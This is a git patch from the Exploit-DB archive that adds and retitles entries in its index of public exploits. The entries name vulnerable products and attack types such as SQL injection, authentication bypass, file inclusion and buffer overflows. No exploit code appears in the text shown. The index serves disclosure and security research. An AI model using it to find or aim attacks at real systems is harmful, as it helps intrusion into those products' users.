From bac881f89a412504b3864e5cb7aefcdddd6c6f8c Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Tue, 3 Jan 2017 05:01:17 +0000
Subject: [PATCH] DB: 2017-01-03

3 new exploits

QNAP NAS Devices - Heap Overflow

Castle Rock Computing SNMPc 7.0.19 - Community String Stack Based Buffer Overflow

Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)

PHPFanBase 2.x - (protection.php) Remote File Inclusion
PHPFanBase 2.x - 'protection.php' Remote File Inclusion

DigiAffiliate 1.4 - (visu_user.asp id) SQL Injection
DigiAffiliate 1.4 - 'id' Parameter SQL Injection

ExoPHPDesk 1.2.1 - (faq.php) SQL Injection
ExoPHPDesk 1.2.1 - 'faq.php' SQL Injection

MiniGal b13 - (image backdoor) Remote Code Execution
MiniGal b13 - Remote Code Execution
PHP Auto Listings - 'moreinfo.php pg' SQL Injection
Pre Simple CMS - SQL Injection (Authentication Bypass)
PHP Auto Listings - 'pg' Parameter SQL Injection
Pre Simple CMS - Authentication Bypass

Harlandscripts drinks - (recid) SQL Injection
Harlandscripts drinks - 'recid' Parameter SQL Injection

Mole Group Taxi Calc Dist Script - (Authentication Bypass) SQL Injection
Mole Group Taxi Calc Dist Script - Authentication Bypass

DevelopItEasy Membership System 1.3 - (Authentication Bypass) SQL Injection
DevelopItEasy Membership System 1.3 - Authentication Bypass

NICE FAQ Script - (Authentication Bypass) SQL Injection
NICE FAQ Script - Authentication Bypass

SoftComplex PHP Image Gallery 1.0 - (Authentication Bypass) SQL Injection
SoftComplex PHP Image Gallery 1.0 - Authentication Bypass
DELTAScripts PHP Classifieds 7.5 - (Authentication Bypass) SQL Injection
DELTAScripts PHP Links 1.3 - (Authentication Bypass) SQL Injection
DELTAScripts PHP Shop 1.0 - (Authentication Bypass) SQL Injection
SoftComplex PHP Image Gallery - (ctg) SQL Injection
DELTAScripts PHP Classifieds 7.5 - Authentication Bypass
DELTAScripts PHP Links 1.3 - Authentication Bypass
DELTAScripts PHP Shop 1.0 - Authentication Bypass
SoftComplex PHP Image Gallery - 'ctg' Parameter SQL Injection
TurnkeyForms Business Survey Pro 1.0 - 'id' SQL Injection
Mole Group Pizza - (manufacturers_id) Script SQL Injection
TurnkeyForms Business Survey Pro 1.0 - 'id' Parameter SQL Injection
Mole Group Pizza - 'manufacturers_id' Parameter SQL Injection
E-topbiz Online Store 1 - (Authentication Bypass) SQL Injection
PHP Auto Listings Script - (Authentication Bypass) SQL Injection
Mole Group Rental Script - (Authentication Bypass) SQL Injection
MyioSoft Ajax Portal 3.0 - (Authentication Bypass) SQL Injection
MyioSoft EasyBookMarker - (Authentication Bypass) SQL Injection
MyioSoft EasyCalendar - (Authentication Bypass) SQL Injection
E-topbiz Online Store 1 - Authentication Bypass
PHP Auto Listings Script - Authentication Bypass
Mole Group Rental Script - Authentication Bypass
MyioSoft Ajax Portal 3.0 - Authentication Bypass
MyioSoft EasyBookMarker 4.0 - Authentication Bypass
MyioSoft EasyCalendar - Authentication Bypass

E-topbiz Online Store 1 - 'cat_id' SQL Injection
E-topbiz Online Store 1 - 'cat_id' Parameter SQL Injection

Myiosoft EasyBookMarker 4 - (Parent) SQL Injection
Myiosoft EasyBookMarker 4 - 'Parent' Parameter SQL Injection
Enthusiast 3.1.4 - (show_joined.php path) Remote File Inclusion
V3 Chat Profiles/Dating Script 3.0.2 - (Authentication Bypass) SQL Injection
Enthusiast 3.1.4 - 'show_joined.php' Remote File Inclusion
V3 Chat Profiles/Dating Script 3.0.2 - Authentication Bypass
DigiAffiliate 1.4 - (Authentication Bypass) SQL Injection
Mole Group Airline Ticket Script - (Authentication Bypass) SQL Injection
DigiAffiliate 1.4 - Authentication Bypass
Mole Group Airline Ticket Script - Authentication Bypass
ExoPHPDesk 1.2 Final - (Authentication Bypass) SQL Injection
ZEEMATRI 3.0 - (bannerclick.php adid) SQL Injection
ExoPHPDesk 1.2 Final - Authentication Bypass
ZEEMATRI 3.0 - 'adid' Parameter SQL Injection

Joomla! Component com_books - (book_id) SQL Injection
Joomla! Component com_books - 'book_id' Parameter SQL Injection

Joomla! / Mambo Component 'com_catalogproduction' - 'id' SQL Injection
Joomla! / Mambo Component com_catalogproduction - 'id' Parameter SQL Injection

PozScripts Business Directory Script - 'cid' SQL Injection
PozScripts Business Directory Script - 'cid' Parameter SQL Injection
Alstrasoft Web Host Directory - (Authentication Bypass) SQL Injection
Quick Poll Script - 'code.php id' SQL Injection
Alstrasoft Web Host Directory - Authentication Bypass
Quick Poll Script - 'id' Parameter SQL Injection

Bankoi Webhost Panel 1.20 - (Authentication Bypass) SQL Injection
Bankoi Webhost Panel 1.20 - Authentication Bypass
Minigal b13 - 'index.php list' Remote File Disclosure
yahoo answers - 'id' SQL Injection
Minigal b13 - Remote File Disclosure
yahoo answers - 'id' Parameter SQL Injection

PHPstore Wholesale - 'track.php?id' SQL Injection
PHPstore Wholesale - 'id' Parameter SQL Injection

E-topbiz ADManager 4 - (group) Blind SQL Injection
E-topbiz ADManager 4 - 'group' Parameter Blind SQL Injection
PHPfan 3.3.4 - (init.php includepath) Remote File Inclusion
Jadu Galaxies - 'categoryId' Blind SQL Injection
PHPfan 3.3.4 - 'init.php' Remote File Inclusion
Jadu Galaxies - 'categoryId' Parameter Blind SQL Injection

MemHT Portal 4.0.1 - (avatar) Remote Code Execution
MemHT Portal 4.0.1 - Remote Code Execution

MemHT Portal 4.0.1 - (pvtmsg) Delete All Private Messages Exploit
MemHT Portal 4.0.1 - Delete All Private Messages Exploit

MyioSoft Ajax Portal 3.0 - (page) SQL Injection
MyioSoft Ajax Portal 3.0 - 'page' Parameter SQL Injection

X10media Mp3 Search Engine < 1.6.2 Admin Access
X10media Mp3 Search Engine < 1.6.2 - Admin Access

Arab Portal 2.2 - (Authentication Bypass) SQL Injection
Arab Portal 2.2 - Authentication Bypass

Arab Portal 2.x - (forum.php qc) SQL Injection
Arab Portal 2.x - 'forum.php' SQL Injection

Arab Portal 2.2 - (mod.php module) Local File Inclusion
Arab Portal 2.2 - 'mod.php' Local File Inclusion

Collabtive - SQL Injection
Collabtive 0.65 - SQL Injection
All Enthusiast ReviewPost PHP Pro 2.5 - showproduct.php SQL Injection
All Enthusiast ReviewPost PHP Pro 2.5 - showcat.php SQL Injection
All Enthusiast ReviewPost PHP Pro 2.5 - 'showproduct.php' SQL Injection
All Enthusiast ReviewPost PHP Pro 2.5 - 'showcat.php' SQL Injection

All Enthusiast PhotoPost PHP Pro 5.0 - adm-photo.php Arbitrary Image Manipulation
All Enthusiast PhotoPost PHP Pro 5.0 - 'adm-photo.php' Arbitrary Image Manipulation

Collabtive 1.0 - (manageuser.php task Parameter) SQL Injection
Collabtive 1.0 - 'manageuser.php' SQL Injection

Arab Portal 2.0 - Link.php SQL Injection
Arab Portal 2.0 - 'Link.php' SQL Injection
Arab Portal System 2.0 - online.php title Parameter Cross-Site Scripting
Arab Portal System 2.0 - download.php title Parameter Cross-Site Scripting
Arab Portal 2.0 - 'online.php' Cross-Site Scripting
Arab Portal 2.0 - 'download.php' Cross-Site Scripting

ExoPHPDesk 1.2 - Pipe.php Remote File Inclusion
ExoPHPDesk 1.2 - 'Pipe.php' Remote File Inclusion

Collabtive 1.1 - (managetimetracker.php id Parameter) SQL Injection
Collabtive 1.1 - 'managetimetracker.php' SQL Injection

Zeeways Shaadi Clone 2.0 - 'admin/home.php' Authentication Bypass
Zeeways Shaadi Clone 2.0 - Authentication Bypass

PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - (AIO) 'PwnScriptum' Remote Code Execution
---
 files.csv                          | 126 +++++------
 platforms/linux/dos/40985.txt      | 333 +++++++++++++++++++++++++++++
 platforms/multiple/remote/31715.pl |  70 ------
 platforms/php/webapps/40986.py     | 208 ++++++++++++++++++
 platforms/windows/remote/40984.py  | 161 ++++++++++++++
 5 files changed, 766 insertions(+), 132 deletions(-)
 create mode 100755 platforms/linux/dos/40985.txt
 delete mode 100755 platforms/multiple/remote/31715.pl
 create mode 100755 platforms/php/webapps/40986.py
 create mode 100755 platforms/windows/remote/40984.py

diff --git a/files.csv b/files.csv
index bea47ac47..bb964c279 100644
--- a/files.csv
+++ b/files.csv
@@ -5331,6 +5331,7 @@ id,file,description,date,author,platform,type,port
 40959,platforms/multiple/dos/40959.c,"macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement",2016-12-22,"Google Security Research",multiple,dos,0
 40964,platforms/windows/dos/40964.py,"XAMPP Control Panel - Denial Of Service",2016-12-25,hyp3rlinx,windows,dos,0
 40965,platforms/windows/dos/40965.py,"FTPShell Server 6.36 - '.csv' Local Denial of Service",2016-12-26,"sultan albalawi",windows,dos,0
+40985,platforms/linux/dos/40985.txt,"QNAP NAS Devices - Heap Overflow",2017-01-02,bashis,linux,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -13952,7 +13953,6 @@ id,file,description,date,author,platform,type,port
 31634,platforms/unix/remote/31634.py,"Python zlib Module - Remote Buffer Overflow",2008-04-09,"Justin Ferguson",unix,remote,0
 31638,platforms/windows/remote/31638.txt,"HP OpenView Network Node Manager (OV NNM) 7.x -OpenView5.exe Action Parameter Traversal Arbitrary File Access",2008-04-11,"Luigi Auriemma",windows,remote,0
 31639,platforms/php/remote/31639.txt,"Trillian 3.1.9 - DTD File XML Parser Buffer Overflow",2008-04-11,david130490,php,remote,0
-31715,platforms/multiple/remote/31715.pl,"Castle Rock Computing SNMPc 7.0.19 - Community String Stack Based Buffer Overflow",2008-11-11,"raveen Darshanam",multiple,remote,0
 31917,platforms/windows/remote/31917.rb,"Symantec Endpoint Protection Manager - Remote Command Execution (Metasploit)",2014-02-26,Metasploit,windows,remote,9090
 31689,platforms/windows/remote/31689.py,"HP Data Protector - EXEC_BAR Remote Command Execution",2014-02-16,"Chris Graham",windows,remote,5555
 31694,platforms/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow",2014-02-16,"Muhammad EL Harmeel",windows,remote,0
@@ -15198,6 +15198,7 @@ id,file,description,date,author,platform,type,port
 40930,platforms/osx/remote/40930.txt,"Horos 2.1.0 Web Portal - Directory Traversal",2016-12-16,LiquidWorm,osx,remote,0
 40949,platforms/cgi/remote/40949.rb,"NETGEAR WNR2000v5 - Remote Code Execution",2016-12-21,"Pedro Ribeiro",cgi,remote,80
 40963,platforms/linux/remote/40963.txt,"OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading",2016-12-23,"Google Security Research",linux,remote,22
+40984,platforms/windows/remote/40984.py,"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)",2017-01-02,"Fady Mohammed Osman",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -17058,7 +17059,7 @@ id,file,description,date,author,platform,type,port
 2953,platforms/php/webapps/2953.php,"PHP-Update 2.7 - extract() Authentication Bypass / Shell Inject Exploit",2006-12-19,rgod,php,webapps,0
 2955,platforms/php/webapps/2955.txt,"Paristemi 0.8.3b - (buycd.php) Remote File Inclusion",2006-12-19,nuffsaid,php,webapps,0
 2956,platforms/php/webapps/2956.txt,"phpProfiles 3.1.2b - Multiple Remote File Inclusion",2006-12-19,nuffsaid,php,webapps,0
-2957,platforms/php/webapps/2957.txt,"PHPFanBase 2.x - (protection.php) Remote File Inclusion",2006-12-19,"Cold Zero",php,webapps,0
+2957,platforms/php/webapps/2957.txt,"PHPFanBase 2.x - 'protection.php' Remote File Inclusion",2006-12-19,"Cold Zero",php,webapps,0
 2958,platforms/php/webapps/2958.txt,"cwmVote 1.0 - (archive.php) Remote File Inclusion",2006-12-19,bd0rk,php,webapps,0
 2960,platforms/php/webapps/2960.pl,"cwmCounter 5.1.1 - (statistic.php) Remote File Inclusion",2006-12-19,bd0rk,php,webapps,0
 2962,platforms/asp/webapps/2962.txt,"Burak Yilmaz Download Portal - 'down.asp' SQL Injection",2006-12-19,ShaFuck31,asp,webapps,0
@@ -17174,7 +17175,7 @@ id,file,description,date,author,platform,type,port
 3118,platforms/php/webapps/3118.txt,"TLM CMS 1.1 - (i-accueil.php chemin) Remote File Inclusion",2007-01-12,GoLd_M,php,webapps,0
 3120,platforms/php/webapps/3120.txt,"Mint Haber Sistemi 2.7 - (duyuru.asp id) SQL Injection",2007-01-12,chernobiLe,php,webapps,0
 3121,platforms/php/webapps/3121.txt,"Poplar Gedcom Viewer 2.0 - 'common.php' Remote File Inclusion",2007-01-12,GoLd_M,php,webapps,0
-3122,platforms/asp/webapps/3122.pl,"DigiAffiliate 1.4 - (visu_user.asp id) SQL Injection",2007-01-13,ajann,asp,webapps,0
+3122,platforms/asp/webapps/3122.pl,"DigiAffiliate 1.4 - 'id' Parameter SQL Injection",2007-01-13,ajann,asp,webapps,0
 3123,platforms/php/webapps/3123.htm,"FdWeB Espace Membre 2.01 - (path) Remote File Inclusion",2007-01-13,ajann,php,webapps,0
 3124,platforms/php/webapps/3124.php,"ThWboard 3.0b2.84-php5 - SQL Injection / Code Execution",2007-01-14,rgod,php,webapps,0
 3125,platforms/php/webapps/3125.c,"JV2 Folder Gallery 3.0 - 'download.php' Remote File Disclosure",2007-01-14,PeTrO,php,webapps,0
@@ -17235,7 +17236,7 @@ id,file,description,date,author,platform,type,port
 3231,platforms/php/webapps/3231.txt,"PHPBB2 MODificat 0.2.0 - 'functions.php' Remote File Inclusion",2007-01-30,"Mehmet Ince",php,webapps,0
 3232,platforms/php/webapps/3232.txt,"Michelles L2J Dropcalc 4 - SQL Injection",2007-01-31,Codebreak,php,webapps,0
 3233,platforms/asp/webapps/3233.txt,"Fullaspsite Asp Hosting Sitesi - (tr) SQL Injection",2007-01-31,cl24zy,asp,webapps,0
-3234,platforms/php/webapps/3234.txt,"ExoPHPDesk 1.2.1 - (faq.php) SQL Injection",2007-01-31,ajann,php,webapps,0
+3234,platforms/php/webapps/3234.txt,"ExoPHPDesk 1.2.1 - 'faq.php' SQL Injection",2007-01-31,ajann,php,webapps,0
 3235,platforms/php/webapps/3235.txt,"phpBB Tweaked 3 - 'phpbb_root_path' Remote File Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0
 3236,platforms/php/webapps/3236.txt,"Hailboards 1.2.0 - 'phpbb_root_path' Remote File Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0
 3237,platforms/php/webapps/3237.txt,"Cadre PHP Framework - Remote File Inclusion",2007-01-31,y3dips,php,webapps,0
@@ -17556,7 +17557,7 @@ id,file,description,date,author,platform,type,port
 3751,platforms/php/webapps/3751.txt,"Anthologia 0.5.2 - (index.php ads_file) Remote File Inclusion",2007-04-17,Dj7xpl,php,webapps,0
 3752,platforms/php/webapps/3752.txt,"AjPortal2Php - (PagePrefix) Remote File Inclusion",2007-04-17,"Alkomandoz Hacker",php,webapps,0
 3753,platforms/php/webapps/3753.txt,"Joomla! Component JoomlaPack 1.0.4a2 RE - (CAltInstaller.php) Remote File Inclusion",2007-04-17,"Cold Zero",php,webapps,0
-3754,platforms/php/webapps/3754.pl,"MiniGal b13 - (image backdoor) Remote Code Execution",2007-04-17,Dj7xpl,php,webapps,0
+3754,platforms/php/webapps/3754.pl,"MiniGal b13 - Remote Code Execution",2007-04-17,Dj7xpl,php,webapps,0
 3756,platforms/php/webapps/3756.txt,"Cabron Connector 1.1.0-Full - Remote File Inclusion",2007-04-17,Dj7xpl,php,webapps,0
 3758,platforms/php/webapps/3758.php,"ShoutPro 1.5.2 - (shout.php) Remote Code Injection",2007-04-17,Gammarays,php,webapps,0
 3759,platforms/php/webapps/3759.pl,"Joomla! Component Template Be2004-2 - 'index.php' Remote File Inclusion",2007-04-17,"Cold Zero",php,webapps,0
@@ -19884,33 +19885,33 @@ id,file,description,date,author,platform,type,port
 7000,platforms/php/webapps/7000.txt,"Pre Classified Listings - Insecure Cookie Handling",2008-11-05,G4N0K,php,webapps,0
 7001,platforms/php/webapps/7001.txt,"DFLabs PTK 1.0 - Local Command Execution",2008-11-05,ikki,php,webapps,0
 7002,platforms/php/webapps/7002.txt,"Joomla! Component Dada Mail Manager 2.6 - Remote File Inclusion",2008-11-05,NoGe,php,webapps,0
-7003,platforms/php/webapps/7003.txt,"PHP Auto Listings - 'moreinfo.php pg' SQL Injection",2008-11-05,G4N0K,php,webapps,0
-7004,platforms/php/webapps/7004.txt,"Pre Simple CMS - SQL Injection (Authentication Bypass)",2008-11-05,"Hussin X",php,webapps,0
+7003,platforms/php/webapps/7003.txt,"PHP Auto Listings - 'pg' Parameter SQL Injection",2008-11-05,G4N0K,php,webapps,0
+7004,platforms/php/webapps/7004.txt,"Pre Simple CMS - Authentication Bypass",2008-11-05,"Hussin X",php,webapps,0
 7005,platforms/php/webapps/7005.txt,"PHP JOBWEBSITE PRO - Authentication Bypass",2008-11-05,Cyber-Zone,php,webapps,0
-7007,platforms/php/webapps/7007.txt,"Harlandscripts drinks - (recid) SQL Injection",2008-11-05,"Ex Tacy",php,webapps,0
+7007,platforms/php/webapps/7007.txt,"Harlandscripts drinks - 'recid' Parameter SQL Injection",2008-11-05,"Ex Tacy",php,webapps,0
 7008,platforms/php/webapps/7008.txt,"Pre Real Estate Listings - Authentication Bypass",2008-11-05,Cyber-Zone,php,webapps,0
 7009,platforms/php/webapps/7009.txt,"Mole Group Airline Ticket Script - SQL Injection",2008-11-05,InjEctOr5,php,webapps,0
-7010,platforms/php/webapps/7010.txt,"Mole Group Taxi Calc Dist Script - (Authentication Bypass) SQL Injection",2008-11-05,InjEctOr5,php,webapps,0
+7010,platforms/php/webapps/7010.txt,"Mole Group Taxi Calc Dist Script - Authentication Bypass",2008-11-05,InjEctOr5,php,webapps,0
 7011,platforms/php/webapps/7011.pl,"Simple Machines Forum (SMF) 1.1.6 - (Local File Inclusion) Code Execution",2008-11-05,~elmysterio,php,webapps,0
 7012,platforms/php/webapps/7012.txt,"hMAilServer 4.4.2 - (PHPWebAdmin) File Inclusion",2008-11-06,Nine:Situations:Group,php,webapps,0
 7013,platforms/php/webapps/7013.txt,"DevelopItEasy Events Calendar 1.2 - Multiple SQL Injections",2008-11-06,InjEctOr5,php,webapps,0
 7014,platforms/php/webapps/7014.txt,"DevelopItEasy News And Article System 1.4 - SQL Injection",2008-11-06,InjEctOr5,php,webapps,0
-7015,platforms/php/webapps/7015.txt,"DevelopItEasy Membership System 1.3 - (Authentication Bypass) SQL Injection",2008-11-06,InjEctOr5,php,webapps,0
+7015,platforms/php/webapps/7015.txt,"DevelopItEasy Membership System 1.3 - Authentication Bypass",2008-11-06,InjEctOr5,php,webapps,0
 7016,platforms/php/webapps/7016.txt,"DevelopItEasy Photo Gallery 1.2 - SQL Injection",2008-11-06,InjEctOr5,php,webapps,0
 7017,platforms/php/webapps/7017.txt,"Pre ADS Portal 2.0 - Authentication Bypass / Cross-Site Scripting",2008-11-06,G4N0K,php,webapps,0
-7018,platforms/php/webapps/7018.txt,"NICE FAQ Script - (Authentication Bypass) SQL Injection",2008-11-06,r45c4l,php,webapps,0
+7018,platforms/php/webapps/7018.txt,"NICE FAQ Script - Authentication Bypass",2008-11-06,r45c4l,php,webapps,0
 7019,platforms/php/webapps/7019.txt,"Arab Portal 2.1 (Windows) - Remote File Disclosure",2008-11-06,"Khashayar Fereidani",php,webapps,0
 7020,platforms/php/webapps/7020.txt,"MySQL Quick Admin 1.5.5 - Local File Inclusion",2008-11-06,"Vinod Sharma",php,webapps,0
-7021,platforms/php/webapps/7021.txt,"SoftComplex PHP Image Gallery 1.0 - (Authentication Bypass) SQL Injection",2008-11-06,Cyber-Zone,php,webapps,0
+7021,platforms/php/webapps/7021.txt,"SoftComplex PHP Image Gallery 1.0 - Authentication Bypass",2008-11-06,Cyber-Zone,php,webapps,0
 7022,platforms/php/webapps/7022.txt,"LoveCMS 1.6.2 Final - Arbitrary File Delete",2008-11-06,cOndemned,php,webapps,0
-7023,platforms/php/webapps/7023.txt,"DELTAScripts PHP Classifieds 7.5 - (Authentication Bypass) SQL Injection",2008-11-06,ZoRLu,php,webapps,0
-7024,platforms/php/webapps/7024.txt,"DELTAScripts PHP Links 1.3 - (Authentication Bypass) SQL Injection",2008-11-06,ZoRLu,php,webapps,0
-7025,platforms/php/webapps/7025.txt,"DELTAScripts PHP Shop 1.0 - (Authentication Bypass) SQL Injection",2008-11-06,ZoRLu,php,webapps,0
-7026,platforms/php/webapps/7026.txt,"SoftComplex PHP Image Gallery - (ctg) SQL Injection",2008-11-06,"Hussin X",php,webapps,0
+7023,platforms/php/webapps/7023.txt,"DELTAScripts PHP Classifieds 7.5 - Authentication Bypass",2008-11-06,ZoRLu,php,webapps,0
+7024,platforms/php/webapps/7024.txt,"DELTAScripts PHP Links 1.3 - Authentication Bypass",2008-11-06,ZoRLu,php,webapps,0
+7025,platforms/php/webapps/7025.txt,"DELTAScripts PHP Shop 1.0 - Authentication Bypass",2008-11-06,ZoRLu,php,webapps,0
+7026,platforms/php/webapps/7026.txt,"SoftComplex PHP Image Gallery - 'ctg' Parameter SQL Injection",2008-11-06,"Hussin X",php,webapps,0
 7027,platforms/php/webapps/7027.txt,"Prozilla Software Directory - Cross-Site Scripting / SQL Injection",2008-11-06,G4N0K,php,webapps,0
 7028,platforms/php/webapps/7028.txt,"TurnkeyForms Entertainment Portal 2.0 - Insecure Cookie Handling",2008-11-07,G4N0K,php,webapps,0
-7029,platforms/php/webapps/7029.txt,"TurnkeyForms Business Survey Pro 1.0 - 'id' SQL Injection",2008-11-07,G4N0K,php,webapps,0
-7030,platforms/php/webapps/7030.txt,"Mole Group Pizza - (manufacturers_id) Script SQL Injection",2008-11-07,InjEctOr5,php,webapps,0
+7029,platforms/php/webapps/7029.txt,"TurnkeyForms Business Survey Pro 1.0 - 'id' Parameter SQL Injection",2008-11-07,G4N0K,php,webapps,0
+7030,platforms/php/webapps/7030.txt,"Mole Group Pizza - 'manufacturers_id' Parameter SQL Injection",2008-11-07,InjEctOr5,php,webapps,0
 7031,platforms/php/webapps/7031.php,"e-Vision CMS 2.0.2 - Multiple Local File Inclusion",2008-11-07,StAkeR,php,webapps,0
 7032,platforms/php/webapps/7032.txt,"U&M Software Signup 1.1 - Authentication Bypass",2008-11-07,G4N0K,php,webapps,0
 7033,platforms/php/webapps/7033.txt,"U&M Software JustBookIt 1.0 - Authentication Bypass",2008-11-07,G4N0K,php,webapps,0
@@ -19919,33 +19920,33 @@ id,file,description,date,author,platform,type,port
 7038,platforms/php/webapps/7038.txt,"Joomla! Component ClickHeat 1.0.1 - Multiple Remote File Inclusion",2008-11-07,NoGe,php,webapps,0
 7039,platforms/php/webapps/7039.txt,"Joomla! Component Recly!Competitions 1.0.0 - Multiple Remote File Inclusion",2008-11-07,NoGe,php,webapps,0
 7040,platforms/php/webapps/7040.txt,"Joomla! Component Feederator 1.0.5 - Multiple Remote File Inclusion",2008-11-07,NoGe,php,webapps,0
-7041,platforms/php/webapps/7041.txt,"E-topbiz Online Store 1 - (Authentication Bypass) SQL Injection",2008-11-07,ZoRLu,php,webapps,0
-7042,platforms/php/webapps/7042.txt,"PHP Auto Listings Script - (Authentication Bypass) SQL Injection",2008-11-07,r45c4l,php,webapps,0
-7043,platforms/php/webapps/7043.txt,"Mole Group Rental Script - (Authentication Bypass) SQL Injection",2008-11-07,Cyber-Zone,php,webapps,0
-7044,platforms/php/webapps/7044.txt,"MyioSoft Ajax Portal 3.0 - (Authentication Bypass) SQL Injection",2008-11-07,ZoRLu,php,webapps,0
-7045,platforms/php/webapps/7045.txt,"MyioSoft EasyBookMarker - (Authentication Bypass) SQL Injection",2008-11-07,ZoRLu,php,webapps,0
-7046,platforms/php/webapps/7046.txt,"MyioSoft EasyCalendar - (Authentication Bypass) SQL Injection",2008-11-07,ZoRLu,php,webapps,0
+7041,platforms/php/webapps/7041.txt,"E-topbiz Online Store 1 - Authentication Bypass",2008-11-07,ZoRLu,php,webapps,0
+7042,platforms/php/webapps/7042.txt,"PHP Auto Listings Script - Authentication Bypass",2008-11-07,r45c4l,php,webapps,0
+7043,platforms/php/webapps/7043.txt,"Mole Group Rental Script - Authentication Bypass",2008-11-07,Cyber-Zone,php,webapps,0
+7044,platforms/php/webapps/7044.txt,"MyioSoft Ajax Portal 3.0 - Authentication Bypass",2008-11-07,ZoRLu,php,webapps,0
+7045,platforms/php/webapps/7045.txt,"MyioSoft EasyBookMarker 4.0 - Authentication Bypass",2008-11-07,ZoRLu,php,webapps,0
+7046,platforms/php/webapps/7046.txt,"MyioSoft EasyCalendar - Authentication Bypass",2008-11-07,ZoRLu,php,webapps,0
 7047,platforms/php/webapps/7047.txt,"DELTAScripts PHP Classifieds 7.5 - SQL Injection",2008-11-07,ZoRLu,php,webapps,0
-7048,platforms/php/webapps/7048.txt,"E-topbiz Online Store 1 - 'cat_id' SQL Injection",2008-11-07,Stack,php,webapps,0
+7048,platforms/php/webapps/7048.txt,"E-topbiz Online Store 1 - 'cat_id' Parameter SQL Injection",2008-11-07,Stack,php,webapps,0
 7049,platforms/php/webapps/7049.txt,"Mini Web Calendar 1.2 - File Disclosure / Cross-Site Scripting",2008-11-07,ahmadbady,php,webapps,0
 7050,platforms/php/webapps/7050.txt,"E-topbiz Number Links 1 - 'id' SQL Injection",2008-11-07,"Hussin X",php,webapps,0
 7052,platforms/php/webapps/7052.txt,"Domain Seller Pro 1.5 - 'id' SQL Injection",2008-11-07,TR-ShaRk,php,webapps,0
-7053,platforms/php/webapps/7053.txt,"Myiosoft EasyBookMarker 4 - (Parent) SQL Injection",2008-11-07,G4N0K,php,webapps,0
+7053,platforms/php/webapps/7053.txt,"Myiosoft EasyBookMarker 4 - 'Parent' Parameter SQL Injection",2008-11-07,G4N0K,php,webapps,0
 7057,platforms/php/webapps/7057.pl,"MemHT Portal 4.0 - Remote Code Execution",2008-11-08,Ams,php,webapps,0
 7058,platforms/php/webapps/7058.txt,"zeeproperty 1.0 - Arbitrary File Upload / Cross-Site Scripting",2008-11-08,ZoRLu,php,webapps,0
-7059,platforms/php/webapps/7059.txt,"Enthusiast 3.1.4 - (show_joined.php path) Remote File Inclusion",2008-11-08,BugReport.IR,php,webapps,0
-7061,platforms/php/webapps/7061.txt,"V3 Chat Profiles/Dating Script 3.0.2 - (Authentication Bypass) SQL Injection",2008-11-08,d3b4g,php,webapps,0
+7059,platforms/php/webapps/7059.txt,"Enthusiast 3.1.4 - 'show_joined.php' Remote File Inclusion",2008-11-08,BugReport.IR,php,webapps,0
+7061,platforms/php/webapps/7061.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Authentication Bypass",2008-11-08,d3b4g,php,webapps,0
 7062,platforms/php/webapps/7062.txt,"Zeeways ZeeJobsite 2.0 - Arbitrary File Upload",2008-11-08,ZoRLu,php,webapps,0
 7063,platforms/php/webapps/7063.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Insecure Cookie Handling",2008-11-08,Stack,php,webapps,0
 7064,platforms/php/webapps/7064.pl,"Mambo Component n-form - 'form_id' Parameter Blind SQL Injection",2008-11-08,boom3rang,php,webapps,0
 7065,platforms/php/webapps/7065.txt,"Cyberfolio 7.12.2 - 'theme' Parameter Local File Inclusion",2008-11-08,dun,php,webapps,0
 7066,platforms/php/webapps/7066.txt,"Zeeways Shaadi Clone 2.0 - Authentication Bypass",2008-11-08,G4N0K,php,webapps,0
-7067,platforms/asp/webapps/7067.txt,"DigiAffiliate 1.4 - (Authentication Bypass) SQL Injection",2008-11-08,d3b4g,asp,webapps,0
-7068,platforms/php/webapps/7068.txt,"Mole Group Airline Ticket Script - (Authentication Bypass) SQL Injection",2008-11-08,Cyber-Zone,php,webapps,0
+7067,platforms/asp/webapps/7067.txt,"DigiAffiliate 1.4 - Authentication Bypass",2008-11-08,d3b4g,asp,webapps,0
+7068,platforms/php/webapps/7068.txt,"Mole Group Airline Ticket Script - Authentication Bypass",2008-11-08,Cyber-Zone,php,webapps,0
 7069,platforms/php/webapps/7069.txt,"V3 Chat Live Support 3.0.4 - Insecure Cookie Handling",2008-11-08,Cyber-Zone,php,webapps,0
 7070,platforms/php/webapps/7070.txt,"Zeeways PHOTOVIDEOTUBE 1.1 - Authentication Bypass",2008-11-08,Stack,php,webapps,0
-7071,platforms/php/webapps/7071.txt,"ExoPHPDesk 1.2 Final - (Authentication Bypass) SQL Injection",2008-11-09,Cyber-Zone,php,webapps,0
-7072,platforms/php/webapps/7072.txt,"ZEEMATRI 3.0 - (bannerclick.php adid) SQL Injection",2008-11-09,"Hussin X",php,webapps,0
+7071,platforms/php/webapps/7071.txt,"ExoPHPDesk 1.2 Final - Authentication Bypass",2008-11-09,Cyber-Zone,php,webapps,0
+7072,platforms/php/webapps/7072.txt,"ZEEMATRI 3.0 - 'adid' Parameter SQL Injection",2008-11-09,"Hussin X",php,webapps,0
